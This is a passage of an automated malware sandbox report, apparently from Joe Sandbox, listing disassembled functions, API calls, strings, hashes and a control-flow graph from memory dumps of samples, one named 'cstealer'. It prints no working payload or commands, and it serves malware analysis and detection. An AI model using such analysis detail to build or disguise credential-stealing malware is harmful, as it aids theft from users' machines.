                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileHeader$ExceptionRaise
                                                                                                                                                            • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                                                            • API String ID: 3685223789-3176238549
                                                                                                                                                            • Opcode ID: 0b23890e0f10fa1a3b688baa18843f6da3f2116d39a440a5f9a02df624b830fa
                                                                                                                                                            • Instruction ID: ced3476dadc38c94262a42121e7695cd9a80c4cd5dd8a84ab555dbf85f22aedd
                                                                                                                                                            • Opcode Fuzzy Hash: 0b23890e0f10fa1a3b688baa18843f6da3f2116d39a440a5f9a02df624b830fa
                                                                                                                                                            • Instruction Fuzzy Hash: 93018461A29A8791EF40DB58E5511786360FF40FC4F4460B2EF4E07A69EF7CE548D700
                                                                                                                                                            Function 00007FF8BA246630 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: 257028e53f9e10efd1155f819e75397fd5938a66b84860a4a40924c9f67aeeb9
                                                                                                                                                            • Instruction ID: 6db99bf556056079c98663b7d5d61b98cf4dc548bf334f92f9533a0a6f38dc28
                                                                                                                                                            • Opcode Fuzzy Hash: 257028e53f9e10efd1155f819e75397fd5938a66b84860a4a40924c9f67aeeb9
                                                                                                                                                            • Instruction Fuzzy Hash: D6113A32A08B8182EB208F29F54026977A5FB88FC4F184271EF8C07B68DF3DD5558B00
                                                                                                                                                            Function 00007FF8BA24ECD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF8BA24EF20: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8BA24EFE0
                                                                                                                                                              • Part of subcall function 00007FF8BA24EF20: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF8BA24ECE5), ref: 00007FF8BA24F02F
                                                                                                                                                              • Part of subcall function 00007FF8BA246960: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425AE), ref: 00007FF8BA24696E
                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24ED0A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwindabortterminate
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 4189928240-629598281
                                                                                                                                                            • Opcode ID: 4324f3b8dec270d7fe627d3bc1aa05acc39fc06cb4de1d1a3df777bc5be6cc49
                                                                                                                                                            • Instruction ID: 59e8023d17f18a2b236a49494f79f01f2b106d04766b20f0a22f8655f8297629
                                                                                                                                                            • Opcode Fuzzy Hash: 4324f3b8dec270d7fe627d3bc1aa05acc39fc06cb4de1d1a3df777bc5be6cc49
                                                                                                                                                            • Instruction Fuzzy Hash: A2E0E531C08B8780FB206B24B2801BC67A4EF0CFD0F2481B0DF8806247CE3CD5909201
                                                                                                                                                            Function 00007FF8BA24697C Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF8BA2467F9,?,?,?,?,00007FF8BA24FE12,?,?,?,?,?), ref: 00007FF8BA24699B
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF8BA2467F9,?,?,?,?,00007FF8BA24FE12,?,?,?,?,?), ref: 00007FF8BA246A24
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                            • Opcode ID: 3883b8b30aa71385c4c501ddc4c688998c66794e7e7598c1b5effdf663d03949
                                                                                                                                                            • Instruction ID: b40e51f291064a7db41fc6c3c4c37b28fb294e662c0f3b42d0fddbf84278b711
                                                                                                                                                            • Opcode Fuzzy Hash: 3883b8b30aa71385c4c501ddc4c688998c66794e7e7598c1b5effdf663d03949
                                                                                                                                                            • Instruction Fuzzy Hash: 65113320E1975381FA549B29AA141353691BF48BE0F5886B4DF6E077D5EE3DF441B600

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00007FF8A7DAF8D0 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 469 7ff8a7daf8d0-7ff8a7daf902 GetSystemInfo 470 7ff8a7daf904-7ff8a7daf906 469->470 471 7ff8a7daf908-7ff8a7daf919 469->471 472 7ff8a7daf924-7ff8a7daf935 470->472 471->472 476 7ff8a7daf91b 471->476 474 7ff8a7daf940-7ff8a7daf943 472->474 475 7ff8a7daf937-7ff8a7daf93e 472->475 477 7ff8a7daf975-7ff8a7daf986 474->477 478 7ff8a7daf945-7ff8a7daf94d 474->478 475->477 476->472 479 7ff8a7daf998-7ff8a7daf99f 477->479 480 7ff8a7daf988-7ff8a7daf991 477->480 481 7ff8a7daf964-7ff8a7daf968 478->481 482 7ff8a7daf94f 478->482 483 7ff8a7daf9a1-7ff8a7daf9a3 479->483 484 7ff8a7daf9a5-7ff8a7daf9b6 479->484 480->479 481->477 486 7ff8a7daf96a-7ff8a7daf971 481->486 485 7ff8a7daf953-7ff8a7daf956 482->485 488 7ff8a7daf9c8-7ff8a7daf9d2 483->488 493 7ff8a7daf9c1 484->493 494 7ff8a7daf9b8 484->494 485->481 489 7ff8a7daf958-7ff8a7daf962 485->489 486->477 491 7ff8a7daf9e4-7ff8a7daf9e7 488->491 492 7ff8a7daf9d4-7ff8a7daf9e2 488->492 489->481 489->485 496 7ff8a7daf9e9-7ff8a7daf9f1 491->496 497 7ff8a7dafa2f-7ff8a7dafa39 491->497 495 7ff8a7dafa19-7ff8a7dafa1c 492->495 493->488 494->493 495->497 500 7ff8a7dafa1e-7ff8a7dafa2d 495->500 498 7ff8a7daf9f3 496->498 499 7ff8a7dafa08-7ff8a7dafa0c 496->499 501 7ff8a7dafa40-7ff8a7dafa43 497->501 502 7ff8a7daf9f7-7ff8a7daf9fa 498->502 499->495 503 7ff8a7dafa0e-7ff8a7dafa15 499->503 500->501 504 7ff8a7dafa55-7ff8a7dafa5c 501->504 505 7ff8a7dafa45-7ff8a7dafa4e 501->505 502->499 506 7ff8a7daf9fc-7ff8a7dafa06 502->506 503->495 507 7ff8a7dafa62-7ff8a7dafa73 504->507 508 7ff8a7dafa5e-7ff8a7dafa60 504->508 505->504 506->499 506->502 514 7ff8a7dafa75 507->514 515 7ff8a7dafa7e 507->515 510 7ff8a7dafa85-7ff8a7dafa8f 508->510 512 7ff8a7dafaa1-7ff8a7dafaa4 510->512 513 7ff8a7dafa91-7ff8a7dafa9f 510->513 517 7ff8a7dafaa6-7ff8a7dafaae 512->517 518 7ff8a7dafaec-7ff8a7dafaf6 512->518 516 7ff8a7dafad6-7ff8a7dafad9 513->516 514->515 515->510 516->518 522 7ff8a7dafadb-7ff8a7dafaea 516->522 520 7ff8a7dafab0 517->520 521 7ff8a7dafac5-7ff8a7dafac9 517->521 519 7ff8a7dafafd-7ff8a7dafb00 518->519 523 7ff8a7dafb12-7ff8a7dafb19 519->523 524 7ff8a7dafb02-7ff8a7dafb0b 519->524 525 7ff8a7dafab4-7ff8a7dafab7 520->525 521->516 526 7ff8a7dafacb-7ff8a7dafad2 521->526 522->519 527 7ff8a7dafb1b-7ff8a7dafb1d 523->527 528 7ff8a7dafb1f-7ff8a7dafb30 523->528 524->523 525->521 529 7ff8a7dafab9-7ff8a7dafac3 525->529 526->516 531 7ff8a7dafb42-7ff8a7dafb4c 527->531 535 7ff8a7dafb32 528->535 536 7ff8a7dafb3b 528->536 529->521 529->525 533 7ff8a7dafb5e-7ff8a7dafb61 531->533 534 7ff8a7dafb4e-7ff8a7dafb5c 531->534 538 7ff8a7dafb63-7ff8a7dafb6b 533->538 539 7ff8a7dafba9-7ff8a7dafbb0 533->539 537 7ff8a7dafb93-7ff8a7dafb96 534->537 535->536 536->531 537->539 542 7ff8a7dafb98-7ff8a7dafba7 537->542 540 7ff8a7dafb82-7ff8a7dafb86 538->540 541 7ff8a7dafb6d 538->541 543 7ff8a7dafbb7-7ff8a7dafbba 539->543 540->537 545 7ff8a7dafb88-7ff8a7dafb8f 540->545 544 7ff8a7dafb71-7ff8a7dafb74 541->544 542->543 546 7ff8a7dafbc5-7ff8a7dafbcc 543->546 547 7ff8a7dafbbc 543->547 544->540 548 7ff8a7dafb76-7ff8a7dafb80 544->548 545->537 549 7ff8a7dafbe1-7ff8a7dafbfa 546->549 550 7ff8a7dafbce-7ff8a7dafbe0 546->550 547->546 548->540 548->544
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.2448454207.00007FF8A7DA1000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8A7DA0000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.2448267981.00007FF8A7DA0000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.2452369686.00007FF8A7EF7000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.2453130459.00007FF8A7EFC000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.2453130459.00007FF8A7F0A000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_7ff8a7da0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                            • Opcode ID: f9f7b25920dae3aac1161b1ec18df20630773ad87d50c89e9d98f821025bc521
                                                                                                                                                            • Instruction ID: 9f81acb6ce33da715c16a34941ef2ce12e574b797d398d6c9ffa013feda1b8ec
                                                                                                                                                            • Opcode Fuzzy Hash: f9f7b25920dae3aac1161b1ec18df20630773ad87d50c89e9d98f821025bc521
                                                                                                                                                            • Instruction Fuzzy Hash: 52A11771A0BB87A9FE648F55A81037C22A1FF44BC4F440675C96E47BA4DFBCE5A0E240